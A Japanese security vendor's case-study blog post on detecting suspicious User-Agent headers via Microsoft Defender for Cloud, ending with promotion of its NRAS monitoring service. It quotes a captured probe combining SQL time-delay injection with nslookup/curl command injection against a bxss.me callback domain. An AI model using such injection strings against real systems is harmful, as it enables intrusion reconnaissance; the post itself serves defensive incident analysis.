こんにちは。
普段からさまざまなログを分析している私たちアナリストですが、その中でも重要な調査観点のひとつとして確認しているのが User-Agent です。User-Agent は Web サイトへアクセスする際にクライアント（ブラウザやアプリ）が送信する情報であり、OS や端末の種別、利用アプリケーションなどを把握するための手がかりになります。

先日、あるお客様の環境にて Microsoft Defender for Cloud が、不審な User-Agent を用いたアクセスをアラートとして検出しました。調査の結果、お客様には当該アクセス元 IP アドレスの遮断に加え、開発ベンダーへの設定確認および改修をご実施いただくことになりました。

本記事では、どのようにして不審な点に気づいたのか、そして弊社としてどのような対応をおこなったのかを事例としてご紹介いたします。

■ 3つのポイント

今回の事例のポイントは、主に以下の 3 つです。

① User-Agent は攻撃の兆候を確認できる一次判断材料として有効

User-Agent には、通常のブラウザや業務アプリでは見られない文字列が含まれることがあります。本事例でも、一見すると古いブラウザを装った文字列中に、nslookup や curl、bxss.me といった通常のブラウザ利用では見られない文字列が含まれていました。User-Agent の平常時との差異を確認することは、侵害が発生する前の兆候調査に有効です。

② 正規の用途で使われるものであってもリスクはある

User-Agent に含まれていたドメイン（bxss.me）は、Blind XSS を含む外部コールバック型の脆弱性検証で利用されることがあるドメインです。正規のセキュリティ診断で使われる場合もある一方で、攻撃者による調査や検証に悪用される可能性もあります。 今回の事例では、User-Agent 全体の不自然さやアクセスの意図を総合的に判断することで、正規の診断と断定せず、不審性があるとして扱われました。

③ 速やかな通知と関係者連携により被害を未然に防止できる
Microsoft Defender for Cloud の検知を起点に、アナリストが速やかに調査と通知を行い、お客様へのヒアリングを実施しました。その結果、IP 遮断や開発ベンダーによる設定確認・改修につなげることができました。攻撃が成立する前段階で対応することで、実害を伴わない予防的なセキュリティ対策が可能になります。

■ 何がおこったか

今回の事例は、Microsoft Defender for Cloud により、通常の利用では想定しにくい User-Agent を伴うアクセスが検知されたことをきっかけに発覚したものです。

User-Agent は、Web アクセス時にクライアントが送信する識別情報であり、OS や端末、利用アプリケーションの種別を把握するための重要な判断材料です。アナリストは日常的なログ分析の中で、この User-Agent の内容が平常時と乖離していないかを確認しています。

今回のログでは、たとえば以下のような User-Agent が確認されました。

……

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)DnmE9eoq'; waitfor delay '0:0:15'--; |(nslookup -q=cname hitadhkgyodly94f7e.bxss.me||curl hitadhkgyodly94f7e.bxss.me);

……

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)-1)

……

先頭の Mozilla/4.0 ... 360SE までは、古い Internet Explorer 系ブラウザに見えるため、一見しただけでは通常のアクセスのようにも見えます。しかし、その後ろに waitfor delay '0:0:15'-- のような SQL Server を想起させる時間差応答の記述や、nslookup、curl によって外部ドメインへ到達できるかを確認するような文字列が連結されていました。

また、別の User-Agent では末尾に -1) という、式の整合性やエラー応答の変化を探る際に見られる不自然な断片も含まれていました。これらは通常のブラウザや業務アプリが送信する User-Agent とは考えにくく、入力値の解釈や応答の差分を確認するための試行であった可能性が高い内容です。そのため、外部への名前解決や HTTP アクセスの可否、あるいはアプリケーションの入力処理の癖を確認することを狙った下調べの段階で使われた可能性があると判断しました。

さらに注目すべき点として、User-Agent に含まれていた「bxss.me」は、Blind XSS を含む外部コールバック型の検証で用いられることがあるドメインでした。このようなドメインは正規のセキュリティ診断で使われる場合もありますが、同時に攻撃者による調査や検証に悪用されるケースもあります。そのため、今回の通信が単なる診断行為なのか、悪意ある行為なのかを慎重に見極める必要がありました。

そこでアナリストから不審性をお客様へ通知し、ヒアリングを実施しました。お客様自身による脆弱性検査の可能性も考慮されましたが、確認の結果、お客様側で実施した操作ではないことが判明しました。幸い、実際の侵害や攻撃成功は確認されませんでしたが、今後のリスクを踏まえ、当該アクセス元 IP アドレスの拒否設定をご実施いただくことになりました。

加えて、この事象を契機としてお客様から開発ベンダーへ設定内容の確認と必要な改修依頼が行われ、実害が発生する前にセキュリティ対策を講じることができました。

■ NRAS でできること

今回の事例では、不審な User-Agent によるアクセスを起点にアラートが発生しました。

アナリストによる迅速な調査により、攻撃に利用されうる脆弱性の確認を目的とした挙動を検知し、侵害が発生する前の段階で予防策をご案内することができました。

結果として、お客様に実害が発生していない段階で対策を講じることができ、攻撃の未然防止につなげることができました。

：

このように、一見すると判断が難しいアクセスであっても、ログの細かな違和感を見逃さずに確認することで、攻撃の兆候を早期に捉えられる場合があります。

弊社では、お客様に安心して日常業務を行っていただくために、Microsoft の先進的なセキュリティを導入するためのご支援や、セキュリティ アラート調査の代行サービスを提供しています。セキュリティ監視や、より安全な業務環境の実現をご検討の際には、ぜひ NRAS の採用をご検討ください。

【サービス詳細】
NR Automate Security（ NRAS）
https://nextread.co.jp/service-nras/

【関連記事】
「すごいぞ NRAS！対応事例のご紹介」シリーズ

・偽 Claude Code をインストールしてしまったデバイスへの対応事例
https://nextread.co.jp/column-casestudy/nr-automate-security01/

・メールを起点とした Infostealer を EDR で検知・隔離した事例
https://nextread.co.jp/column-casestudy/nr-automate-security02/